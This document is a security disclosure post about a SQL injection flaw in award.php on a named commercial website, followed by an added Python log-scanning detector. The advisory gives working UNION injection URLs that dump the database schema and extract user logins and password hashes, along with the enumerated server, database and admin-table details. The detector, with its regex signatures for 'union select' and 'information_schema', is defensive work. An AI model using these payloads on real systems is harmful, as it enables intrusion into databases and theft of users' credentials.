--------------------------------------------------------------------------------------------------------------------------
[+] www.rackspace.com SQL Injection vulnerability
[+] Found By: Rohit Bansal [ SCHAP Security http://schap.org ]
[+] Date: 01-08-2009
----------------------------------------------------------------------------------------------------------------------------

http://www.rackspace.com/information/mediacenter/award.php?id=-99+uNion+Select+1,2,concat(table_schema,table_name),4%20FROM%20information_schema.tables%20--
http://www.rackspace.com/information/mediacenter/award.php?id=-99+uNion+Select+1,2,concat(user_login,user_pass),4%20FROM%20rscom.wp_users%20--

Host Information
Server           = Apache/2.0.52 (Red Hat)
Version          = 5.0.77-log
Powered by       = PHP/5.1.6
Attack Type      = SQL Union Injection
Current User     = rscom@10.100.100.20
Current Database = rscom
Supports Union   = yes
Union Columns    = 4

Url:  http://www.rackspace.com/information/mediacenter/award.php?id=101
Vuln: http://www.rackspace.com/information/mediacenter/award.php?id=101+and+1=0+Union Select 1 ,2, UNHEX(HEX([visible])) ,4
Comment: --
Visible Column: 3

Database: rscom
  information_schema
  rscom
  rscom_dev
  test

Tables: [enumerated table listing, roughly 150 table names, omitted]

Columns: Table pp_admin
  admin_username
  admin_password

--------------------------------------------------------------------------------------------------------------------------
[+] Rohit Bansal [rohitisback@gmail.com]
[+] Schap.org, Infysec, Evilfinger
-------------------------------------------------------------------------------------------------------------------------
-- "You only get smarter, by playing a smarter opponent !"
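Added example, not part of the advisory: a small Python detector that scans Apache-style access-log lines for the UNION-based technique shown above. The log lines are constructed here from the advisory's two request URLs; the log format and the signature list are assumptions, not anything the advisory or Rackspace published.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed access-log lines (combined-log style is an assumption); the request
# targets are the two URLs quoted in the advisory plus the benign baseline request.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Aug/2009:10:00:01 +0000] "GET /information/mediacenter/award.php?id=101 HTTP/1.1" 200 5120
10.0.0.9 - - [01/Aug/2009:10:00:07 +0000] "GET /information/mediacenter/award.php?id=-99+uNion+Select+1,2,concat(table_schema,table_name),4%20FROM%20information_schema.tables%20-- HTTP/1.1" 200 7310
10.0.0.9 - - [01/Aug/2009:10:00:12 +0000] "GET /information/mediacenter/award.php?id=-99+uNion+Select+1,2,concat(user_login,user_pass),4%20FROM%20rscom.wp_users%20-- HTTP/1.1" 200 7402
"""

LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Signatures of the technique in the advisory, applied to the *decoded* parameter so that
# mixed case ("uNion"), '+' spacing and %20 spacing cannot hide them.
SIGNATURES = [
    ("union-select", re.compile(r"\bunion\b\s+(all\s+)?select\b", re.I)),
    ("schema-enum", re.compile(r"\binformation_schema\b", re.I)),
    ("comment-tail", re.compile(r"--\s*$")),
]

def decode_param(value: str) -> str:
    """URL-decode repeatedly until stable, so double-encoded payloads are normalised too."""
    prev = None
    while prev != value:
        prev, value = value, unquote_plus(value)
    return value

def scan_line(line: str):
    """Return a list of (parameter, signature) hits for one log line; empty if clean."""
    m = LOG_RE.search(line)
    if not m:
        return []
    query = urlsplit(m.group("target")).query
    hits = []
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for raw in values:
            decoded = decode_param(raw)
            for sig_name, sig in SIGNATURES:
                if sig.search(decoded):
                    hits.append((name, sig_name))
    return hits

def scan_log(text: str):
    """Map each flagged line number (1-based) to its hits."""
    flagged = {}
    for n, line in enumerate(text.splitlines(), 1):
        hits = scan_line(line)
        if hits:
            flagged[n] = hits
    return flagged
```

The benign id=101 request produces no hits, while both injection requests are flagged on the id parameter; the durable fix on the application side is to bind id as an integer parameter rather than interpolate it into the query.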